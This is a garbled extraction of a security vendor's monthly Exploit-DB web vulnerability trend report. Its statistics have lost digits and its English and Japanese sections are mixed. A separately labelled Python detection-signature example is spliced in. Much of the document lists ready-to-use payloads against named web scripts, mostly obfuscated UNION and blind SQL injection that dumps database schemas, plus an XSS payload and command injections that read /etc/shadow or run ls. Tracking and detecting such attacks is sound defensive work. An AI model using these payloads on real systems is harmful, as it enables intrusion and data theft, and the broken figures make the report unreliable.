EDB-Report: Latest Web Vulnerability Trend Report (07.) 07..0~07..
Vulnerability trend information based on content published on Exploit-DB (http://exploit-db.com)
Penta Security Systems Inc., R&D Center, Data Security Team

Summary

The vulnerability reports published on Exploit-DB in 07. came to [total lost in extraction] in all. Compared with the number published in the preceding month (5), this is a large rise of roughly 70% or more. The rise is almost entirely due to an increase in SQL injection attacks. Moreover, the SQL injection attacks published this month were not entirely new techniques; most were the same vulnerabilities and attack patterns as techniques that had already been published. A successful SQL injection attack causes serious damage, yet its cost to the attacker is comparatively low, so many attackers keep developing and abusing it. To keep preventing such vulnerabilities and maintain security, implementing defense in depth (Defense in depth) with a web application firewall must be considered as an effective countermeasure.

1. By vulnerability category
Vulnerability category: File Upload, Local File Inclusion (LFI), Cross Site Scripting (XSS), Directory Traversal, Command Injection, SQL Injection, Total
Counts as extracted: 0 6 98
(Chart: by vulnerability category)

2. By severity
Severity: Urgent action required, High, Medium, Total
Counts as extracted: 06 4
Share as extracted: 9.8%, .54%, .65%, 00.00%
(Chart: by severity)

3. By difficulty of attack execution
Difficulty: Hard, Medium, Easy, Total
Counts as extracted: 5 9 6
Share as extracted: 4.4%, 8.4%, 4.6%, 00.00%
(Chart: by difficulty of attack execution)

4. Vulnerabilities by major software
Software name: vbulletin, Readymade Video Sharing Script, FS Makemytrip Clone, FS Grubhub Clone, Multireligion Responsive Matrimonial, Xerox DC60 EFI Fiery Controller Webtools, Accesspress Anonymous Post Pro, FS Amazon Clone, Multivendor Penny Auction Clone Script, FS Crowdfunding Script, Car Rental Script, FS Care Clone, Joomla! Component User Bench, FS Monster Clone, Kickstarter Clone Acript, FS Trademe Clone, Professional Service Script, FS Thumbtack Clone, Advanced Real Estate Script, PHP Melody, Resume Clone Script, MistServer, Movie Guide, Artica Web Proxy, FAQ Pro, Techno Portfolio Management Panel, Hot Scripts Clone, Readymade Classifieds Script, Laundry Booking Script, FS Lynda Clone, Opensource Classified Ads Script, WinduCMS, FS Expedia Clone, FS Shaadi Clone, Multiplex Movie Theater Booking Script, FS Indiamart Clone, MLM Forex Market Plan Script, FS Facebook Clone, Muslim Matrimonial Script, OpenEMR, Vanguard, DomainSale PHP Script, FS Ebay Clone, Website Auction Marketplace, Joomla! Component JB Visa, Realestate Crowdfunding Script, Joomla! Component NextGen Editor, FS Stackoverflow Clone, Sendroid, FS Shutterstock Clone, DotNetNuke DreamSlider, FS Quibids Clone, Foodspotting Clone Script, Nearbuy Clone Script, Secure E-commerce Script, Cab Booking Script, Lawyer Search Script, Chartered Accountant Booking Script, Online Exam Test Application Script, Child Care Script, PHP Multivendor Ecommerce, CMS Auditor Website, Readymade PHP Classified Script, Co-work Space Search Script, Responsive Realestate Script, Consumer Complaints Clone Script, Responsive Events & Movie Ticket Booking Script, Entrepreneur Job Portal Script, Single Theater Booking Script, Doctor Search Script, Entrepreneur Bus Booking Script, E-commerce MLM Software, MLM Forced Matrix, Entrepreneur Dating Script, Groupon Clone Script, Event Calendar Category Script, Advanced World Database, FS Linkedin Clone, Basic Job Site Script, Video Gallery, Joomla! Component Jbuildozer, FS Freelancer Clone, Question And Answer, Bus Booking Script, Linksys WVBR0, Paid To Read Script, FS Gigs Script, Piwigo, FS Foodpanda Clone, ITGuard-Manager, Advance BB Script, Cells Blog, Advance Online Learning Management Script, Joomla! Component Guru Pro, Affiliate MLM Script, Joomla! Component My Projects, Basic BB Script, BEIMS ContractorWeb, Beauty Parlour Booking Script, Biometric Shift Employee Management System, Facebook Clone Script, SilverStripe CMS, Food Order Script, Easy!Appointments, Yoga Class Script, FS Olx Clone, Freelance Website Script, Total
(Chart: vulnerabilities by major software, by difficulty: Hard / Medium / Easy)
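The summary's point that this month's SQL injection reports reuse already-published patterns is what makes the WAF layer it recommends workable. As an added example that is not part of the original report, the Python below runs a normalization-and-signature pass, keyed to the report's six categories, over constructed request lines shaped like entries in the listing; the regular expressions, the sample requests and the handling of the /*!50000UNION*/ comment obfuscation are this example's own assumptions.

```python
"""Signature pass over web requests, keyed to the report's vulnerability categories.

Added example, not part of the Penta Security report: the category names are
the report's; the regular expressions and the request lines are this example's
own assumptions (constructed to mirror payload shapes the report lists).
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Category labels as used in the report's "by vulnerability category" table.
SQLI = "SQL Injection"
XSS = "Cross Site Scripting"
LFI = "Local File Inclusion"
TRAVERSAL = "Directory Traversal"
CMDI = "Command Injection"
UPLOAD = "File Upload"


def normalize(raw):
    """Undo the obfuscation seen in the listed payloads before matching.

    The UNION-based entries hide keywords in MySQL version comments
    (/*!50000UNION*/), URL-encode them and use '+' for spaces; a rule that
    looks for a literal 'UNION SELECT' in the raw request misses all of them.
    """
    text = unquote_plus(unquote_plus(raw))      # also catches double encoding
    text = re.sub(r"/\*!\d*", " ", text)        # /*!50000UNION*/ -> UNION*/
    text = re.sub(r"/\*.*?\*/", " ", text)      # ordinary inline comments
    text = text.replace("*/", " ")              # tail left by version comments
    return re.sub(r"\s+", " ", text).strip().lower()


# One compiled pattern per category; a request may match several.
SIGNATURES = [
    (SQLI, re.compile(
        r"\bunion\b.*\bselect\b"           # UNION-based extraction
        r"|\bsleep\s*\("                   # time-based blind
        r"|\b(and|or)\s+\d+\s*=\s*\d+"     # boolean-based blind (AND 65=65)
        r"|information_schema"             # schema enumeration
        r"|\b(concat_ws|export_set)\s*\(")),
    (XSS, re.compile(
        r"<\s*script|javascript:|\bon(load|error|click|mouseover|readystatechange)\s*=")),
    (LFI, re.compile(r"/etc/passwd|/etc/shadow|\bphp://")),
    (TRAVERSAL, re.compile(r"(\.\./|\.\.\\){2,}")),
    (CMDI, re.compile(r"`[^`]+`|\$\([^)]*\)|[;|]\s*(cat|ls|id|whoami|uname)\b")),
    (UPLOAD, re.compile(r"filename=\"?[^\"&\s]+\.ph(p|tml|ar)\b")),
]


def classify(request):
    """Return the report categories whose signature fires for one request line."""
    text = normalize(request)
    return [name for name, pattern in SIGNATURES if pattern.search(text)]


def summarize(requests):
    """Count hits per category, the same breakdown as the report's first table."""
    counts = Counter()
    for request in requests:
        for category in classify(request) or ["Unclassified"]:
            counts[category] += 1
    return counts


# Constructed request lines (not real traffic); shapes follow entries in the report.
SAMPLE_REQUESTS = [
    "GET /listings.php?catid=12 HTTP/1.1",                               # benign
    "GET /browse-category.php?cat=food HTTP/1.1",                        # benign
    "GET /pages.php?id=1%20OR%20SLEEP(5) HTTP/1.1",                      # time-based SQLi
    "GET /single.php?id=-1+/*!50000UNION*/(/*!50000SELECT*/+1,2,3)-- HTTP/1.1",  # comment-obfuscated UNION
    "GET /itechd.php?productid=609%20AND%2065=65 HTTP/1.1",              # boolean-based SQLi
    "GET /admin/api?command=%7B%22username%22:%22%3Cscript%3Ealert(1)%3C/script%3E%22%7D HTTP/1.1",  # XSS
    "POST /contact_page content=%3Cimg%20src%3D%22/etc/passwd%22%3E",    # local file disclosure
    "POST /interface/fax/fax_dispatch.php form_filename=%27%20%60ls%20-al%60%20%27",  # OS command injection
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(classify(request) or ["Unclassified"], request)
    print(dict(summarize(SAMPLE_REQUESTS)))
```

A signature pass like this is only one layer of the defense in depth the summary calls for; parameterized queries in the application remain the fix for the SQL injection entries themselves.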

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--0 405 XSS 易高 MistServer. - XSS 脆弱性 /admin/api?command={"authorize":{"password":"666","usern ame":"<script>alert(document.body.innerhtml)</script>"}} MistServer MistServer. 07--0 406 Command Injection 中早急対応要 Artica Web Proxy.06 - Command Injection 脆弱性 /freeradius.users.php?username-formid=%c%fscript%e%cscript%evar%0xhr=new%0x MLHttpRequest();xhr.onreadystatechange=function(){if(xhr.sta tus==00){alert(xhr.responsetext);}};xhr.open(%7post%7, %7https://ip:port/system.terminal.php%7,true);xhr.setReq uestheader(%7content-type%7,%7application/x-wwwformurlencoded%7);xhr.send(%7cmdline=cat%0/etc/shadow %7);%C%Fscript%E%Cscript%E Artica Web Proxy Artica Web Proxy.06 07--05 4 SQL Injection 中早急対応要 Techno Portfolio Management Panel.0 - 'id' /single.php?id=- 4++/*!08888UNION*/(/*!08888SELECT*/0x89,0x8 9,CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()), 0x849,0x859,0x869,0x879,(/*!08888SELECT */+GROUP_CONCAT(table_name+SEPARATOR+0xc67e) +/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!088 88WHERE*/+TABLE_SCHEMA=DATABASE()),0x899,0x8 09,0x89,0x89,0x89)-- Techno Portfolio Management Panel Techno Portfolio Management Panel.0 07--05 4 SQL Injection 中早急対応要 Readymade Classifieds Script.0 /listings.php?catid=- ++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)))-- Readymade Classifieds Script Readymade Classifieds Script.0 07--06 4 SQL Injection 易早急対応要 FS Makemytrip Clone - 'id' /pages.php?id= OR SLEEP(5) FS Makemytrip Clone FS Makemytrip Clone 07--06 44 LFI 中中 WinduCMS. - Local File Disclosure 脆弱性 POST /contact_page?mn=contactform.message.negative HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 WinduCMS WinduCMS. 
email=test@test.com&content=<img src="/etc/passwd" 07--06 45 SQL Injection 中早急対応要 FS Shaadi Clone - 'token' /view_profile.php?token=-5886' UNION ALL SELECT NULL,CONCAT(0x767877,0x65755a46504d6a54657 874d765a594a559556c44f4d76c45444958686e44555 64770567,0x77078707),NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL-- FS Shaadi Clone FS Shaadi Clone 07--07 47 SQL Injection 中早急対応要 - 'id' /show_misc_video.php?id=id=-58 UNION ALL SELECT NULL,CONCAT(0x7766b67,0x454e4e656f6a7a4676744c 59447955a49667047666686f6d6b46774d6745a7a4e 585767065,0x7707a707),NULL,NULL,NULL,NULL,NULL,N ULL-- 07--07 48 SQL Injection 中早急対応要 FS Facebook Clone - 'token' /group.php?token=-86' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7787677,0x546d597a667 557a70475a50454e7765449574c76677746e7a557579 7467574a6d5954468,0x7766a6a7),NULL,NULL,NULL, NULL,NULL-- FS Facebook Clone FS Facebook Clone 07--07 4 Command Injection 中早急対応要 OpenEMR 5.0.0 - OS Command Injection POST /interface/fax/fax_dispatch.php?scan=x HTTP/. 
User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 OpenEMR OpenEMR 5.0.0 form_save=&form_cb_copy=&form_cb_copy_type=&form _images[]=x&form_filename=' ls -al '&form_pid= 07--08 45 SQL Injection 中早急対応要 DomainSale PHP Script.0 - 'id' /domain.php?id=4'++/*!union*/(/*!select*/ +0x89,/*!50000CONCAT_WS*/(0x0a0,USER(),DAT ABASE(),VERSION()),0x89,(/*!08888Select*/+export_set (5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informat ion_schema.columns)where@:=export_set(5,export_set(5,@,/ *!08888table_name*/,0xc6c69e,),/*!08888column_nam e*/,0xaa,)),@,)),0x859,0x869,0x879,0x88 9,0x899,0x809,0x89,0x89)-- DomainSale PHP Script DomainSale PHP Script.0 07--08 48 SQL Injection 中早急対応要 Website Auction Marketplace.0.5 - 'cat_id' /single-cause.php?pid=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(), (),(),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSI ON()),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9 ),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5))-- Website Auction Marketplace Website Auction Marketplace.0.5 07--08 49 SQL Injection 中早急対応要 Realestate Crowdfunding Script.7. - 'pid' /single-cause.php?pid=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(), (),(),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSI ON()),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9 ),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5))-- Realestate Crowdfunding Script Realestate Crowdfunding Script.7. 
07--08 440 SQL Injection 中早急対応要 FS Thumbtack Clone.0 - 'cat' / 'sc' /browse-category.php?cat=- 9a87ff679afe7d98a67b754c'++/*!UNION */(/*!SELECT*/(),CONCAT_WS(0x0a0,USER(),DAT ABASE(),VERSION()),(),(4))-- /browse-scategory.php?sc=- 40cb96ac59075b964b075d4b70'++/*!UNI ON*/+/*!SELECT*/+,,CONCAT_WS(0x0a0,USER( ),DATABASE(),VERSION()),4,5,6,7,8,9-- FS Thumbtack Clone FS Thumbtack Clone.0 07--08 44 SQL Injection 中早急対応要 FS Stackoverflow Clone.0 - 'keywords' POST /question/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 FS Stackoverflow Clone FS Stackoverflow Clone.0 keywords='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x4948544e05454e444e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''='

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--08 44 SQL Injection 中早急対応要 FS Shutterstock Clone.0 - 'keywords' SQL Injection POST /Category/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keywords='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x4948544e05454e444e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' FS Shutterstock Clone FS Shutterstock Clone.0 07--08 44 SQL Injection 易早急対応要 FS Quibids Clone.0 /itechd.php?productid=609 AND 65=65 FS Quibids Clone FS Quibids Clone.0 07--08 444 SQL Injection 中早急対応要 FS Olx Clone.0 - 'scat' / 'pid' /subpage.php?scat=5'++union+all+select+,,,4,(sele CT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(I NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0 x696e666f76d674696f6e5f7668656d6)and(0x00)in( @x:=concat(@x,lpad(@nr:=@nr+,4,0x0),0xa0,table_ name,0xc67e))))x),6,7,8,9,0,,,,4,5,6,7,8, 9,0,,,,4,5,6-- FS Olx Clone FS Olx Clone.0 07--08 445 SQL Injection 中早急対応要 FS Monster Clone.0 - 'Employer_Details.php?id' /Employer_Details.php?id=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(SELE CT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(I NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0 x696e666f76d674696f6e5f7668656d6)and(0x00)in( @x:=concat(@x,lpad(@nr:=@nr+,4,0x0),0xa0,table_ name,0xc67e))))x),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),() )-- FS Monster Clone FS Monster Clone.0 07--08 446 SQL Injection 中早急対応要 FS Makemytrip Clone.0 - 'fl_orig' / 'fl_dest' /show-flightresult.php?&fl_orig=7'++union(select(),(),(),(4),(5),(6), (7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(SELECT+GROUP_CONCAT(table_name+SEPA RATOR+0xc67e)+FROM+INFORMATION_SCHEMA.TABL ES+WHERE+TABLE_SCHEMA=DATABASE()),(5),(6),(7),( 8))-- FS Makemytrip Clone FS 
Makemytrip Clone.0 07--08 468 SQL Injection 易早急対応要 Nearbuy Clone Script. - 'search' /category_list.php?search=s%' AND 775=775 AND '%'=' Nearbuy Clone Script Nearbuy Clone Script. 07--08 469 SQL Injection 中早急対応要 Cab Booking Script.0 - 'city' /servicelist?city=/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5,6, 7,8,9,0,,,CONCAT_WS(0x0a0,USER(),DATABASE (),VERSION()),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--&main_search= Cab Booking Script Cab Booking Script.0 07--08 470 SQL Injection 中早急対応要 Chartered Accountant Booking Script.0 - 'city' /servicelist?city=/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5,6, 7,8,9,0,,,CONCAT_WS(0x0a0,USER(),DATABASE (),VERSION()),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--&main_search= Chartered Accountant Booking Script Chartered Accountant Booking Script.0 07--08 47 SQL Injection 中早急対応要 Child Care Script.0 - 'city' /list?city=+/*!union*/+/*!select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,concat_ WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--&main_search= Child Care Script Child Care Script.0 07--08 47 SQL Injection 中早急対応要 07--08 47 SQL Injection 易早急対応要 07--08 474 SQL Injection 中早急対応要 CMS Auditor Website.0 Co-work Space Search Script.0 - 'city' Consumer Complaints Clone Script.0 - 'id' /news-detail/47%0and%0=-- CMS Auditor Website CMS Auditor Website.0 /list?city=%0and%0=--&main_search= Co-work Space Search Script Co-work Space Search Script.0 /other-user-profile.php?id=- '++/*!50000UNION*/(SELECT(),/*!CONCAT_WS*/(0 x0a0,user(),version()),(),(4),(5),(6),(7),(8),(9),(0),() Consumer Complaints Clone Script Consumer Complaints Clone Script.0,(),(),(4),(5),(6),(7),(8))-- 07--08 475 SQL Injection 中早急対応要 Entrepreneur Job Portal Script.0.6 - 'jobsearch_all.php?rid' /jobsearch_all.php?rid=- '++UNION(SELECT(),(),(),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informatio 
n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 08888table_name*/,0xc6c69e,),/*!08888column_name* /,0xaa,)),@,)),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5 ),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8 ),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54 ))-- Entrepreneur Job Portal Script Entrepreneur Job Portal Script.0.6 07--08 476 SQL Injection 中早急対応要 Doctor Search Script.0 - 'city' /list?city=/*!union*/+/*!select*/+,,,4,5,6, 7,8,9,0,,,,4,5,6,7,8,9,0,,,,CONCAT_ WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--&main_search= Doctor Search Script Doctor Search Script.0 /service_detail.php?pid=- 6'++UNION(SELECT(),(/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7))--+- 07--08 477 SQL Injection 中早急対応要 E-commerce MLM Software.0 /event_detail.php?eventid=- 8'++UNION+ALL+SELECT+,(SELECT+GROUP_CONCAT(tabl e_name+separator+0xc67e)+from+information_ SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),, 4,5,6,7-- E-commerce MLM Software E-commerce MLM Software.0 /news_detail.php?newid=- 7'++UNION+ALL+SELECT+,(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA. COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f6646d696e) AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+,,0x0),0xa0,column_name,0xc67e)))))x),,4,5,6-- 07--08 478 SQL Injection 中早急対応要 Entrepreneur Dating Script.0. 
- 'marital' / 'gender' / 'country' / 'profileid' /search_result.php?marital=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),( 5),(5),(5),(54),(55),(56),(57),(58),(59),(60),(6),(6),(6),( 64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!0 8888select*/+count(*)/*!08888from*/(information_schema.c olumns)where@:=export_set(5,export_set(5,@,/*!08888table _name*/,0xc6c69e,),/*!08888column_name*/,0xaa,)), @,)),(69),(70),(7),(7),(7),(74),(75),(76),(77),(78),(79),(80 ),(8),(8),(8),(84),(85),(86),(87),(88),(89),(90),(9),(9),(9 ))--&submit Entrepreneur Dating Script Entrepreneur Dating Script.0. 07--08 479 SQL Injection 中早急対応要 Event Calendar Category Script.0 - 'city' /event-list?city=- 76'+UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),CON CAT_WS(0x0a0,USER(),DATABASE(),VERSION()),(5),(6) Event Calendar Category Script Event Calendar Category Script.0,(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54))--&main_search=

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--08 449 SQL Injection 中早急対応要 FS Linkedin Clone.0 - 'grid' / 'fid' / 'id' /group.php?grid=- '++UNION+ALL+SELECT+,,,(SELECT(@x)FROM(SELECT(@ x:=0x00),(@nr:=0),(select(0)from(information_schem A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6746 FS Linkedin Clone FS Linkedin Clone.0 96f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD (@NR:=@NR+,4,0x0),0xa0,table_name,0xc67e))))x),5,6,7,8,9,0,,,,4-- 07--08 450 SQL Injection 中早急対応要 FS Indiamart Clone.0 - 'token' / 'id' / 'c' 07--08 45 SQL Injection 中早急対応要.0 - 'f' / 's' / 'id' /catcompany.php?token=- 79b5bad6ab90ce06895c9bde'++UNION(SELE CT(),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0 FS Indiamart Clone FS Indiamart Clone.0 xc67e)+from+information_schema.tables+wher E+TABLE_SCHEMA=DATABASE()),(),(4),(5),(6))-- /movie.php?f=- 0++UNION(SELECT(),(),(),(4),(5),(6),(SELECT+GROUP_C ONCAT(table_name+SEPARATOR+0xc67e)+FROM+INFO RMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DAT ABASE()),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),( 9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4))--.0 07--08 45 SQL Injection 中早急対応要 FS Grubhub Clone.0 - 'keywords' POST /food/ HTTP/. 
User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keywords=' UNION ALL SELECT,,,CONCAT(0x4948544e05454e444e),(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0xc6c69e,),/*!0 8888column_name*/,0xaa,)),@,)),6,7,8,9,0,,,,4,5,6,7,8,9,0,,-- FS Grubhub Clone FS Grubhub Clone.0 07--08 45 SQL Injection 中早急対応要 FS Groupon Clone.0 - 'id' /item_details.php?id=- ++UNION+ALL+SELECT+,,,4,5,6,7,(/*!08888Select*/+ex port_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/( FS Grubhub Clone FS Grubhub Clone.0 information_schema.columns)where@:=export_set(5,export_s et(5,@,/*!08888table_name*/,0xc6c69e,),/*!08888colu mn_name*/,0xaa,)),@,)),9,0,,,,4,5,6,7-- 07--08 454 SQL Injection 中早急対応要 FS Gigs Script.0 - 'cat' / 'sc' /browse-category.php?cat=- 8c4ca48a0b980dcc509a6f75849b'++/*!50000UNIO FS Gigs Script FS Gigs Script.0 N*/+/*!50000SELECT*/+,CONCAT_WS(0x0a0,USER(),D ATABASE(),VERSION()),,4,5-- 07--09 455 SQL Injection 中早急対応要 FS Freelancer Clone.0 - 'profile.php?u' /profile.php?u=c4ca48a0b980dcc509a6f75849b'++union+all+sele CT+,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0 xc67e)+from+information_schema.tables+wher FS Freelancer Clone FS Freelancer Clone.0 E+TABLE_SCHEMA=DATABASE()),,4,5,6,7,8,9,0,,,, 4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5-- 07--09 456 SQL Injection 中早急対応要 FS Ebay Clone.0 - 'id' / 'sub_category_id' / 'category_id' /product.php?id=- 9++UNION(SELECT(),(),(SELECT+GROUP_CONCAT(table_n ame+separator+0xc67e)+from+information_sch FS Ebay Clone FS Ebay Clone.0 EMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9), (0))-- 07--09 457 SQL Injection 中早急対応要 FS Crowdfunding Script.0 - 'latest_news_details.php?id' /latest_news_details.php?id=- 4'++UNION+ALL+SELECT+,,,4,5,CONCAT_WS(0x0a0, USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_se 
t(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informa FS Crowdfunding Script FS Crowdfunding Script.0 tion_schema.columns)where@:=export_set(5,export_set(5,@,/ *!08888table_name*/,0xc6c69e,),/*!08888column_nam e*/,0xaa,)),@,))-- 07--09 458 SQL Injection 中早急対応要 FS Care Clone.0 - 'jobfrequency' / 'jobtype' /searchjob.php?jobtype=%0and%0=-- &jobfrequency=%0and%0=-- FS Care Clone FS Care Clone.0 07--09 459 SQL Injection 中早急対応要 FS Amazon Clone.0 /p/verayari/- 9++UNION(SELECT(),(),CONCAT_WS(0x0a0,USER(),DA FS Amazon Clone FS Amazon Clone.0 TABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(0),(),(),(), (4),(5),(6))-- 07--09 460 SQL Injection 中早急対応要 FS Trademe Clone.0 - 'search' / 'id' /search_item.php?search=s'++union+all+select+,,,4,5, CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),7,8, FS Trademe Clone FS Trademe Clone.0 9,0,,,,4-- 07--09 46 SQL Injection 中早急対応要 FS Expedia Clone.0 - 'fl_orig' / 'fl_dest' / 'id' /show-flightresult.php?fl_orig=5'++union(select(),(),(),(4),(5),(6),( 7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0), (),(),(),(/*!08888Select*/+export_set(5,@:=0,(/*!0888 FS Expedia Clone FS Expedia Clone.0 8select*/+count(*)/*!08888from*/(information_schema.colu mns)where@:=export_set(5,export_set(5,@,/*!08888table_na me*/,0xc6c69e,),/*!08888column_name*/,0xaa,)),@, )),(5),(6),(7),(8))-- 07--09 46 SQL Injection 中早急対応要 FS Foodpanda Clone.0 POST /food/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keywords=' UNION ALL SELECT,,,CONCAT(0x4948544e05454e444e),(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0xc6c69e,),/*!0 8888column_name*/,0xaa,)),@,)),6,7,8,9,0,,,,4,5,6,7,8,9,0,,-- FS Foodpanda Clone FS Foodpanda Clone.0 07--09 46 SQL Injection 中早急対応要 Advance BB Script.. 
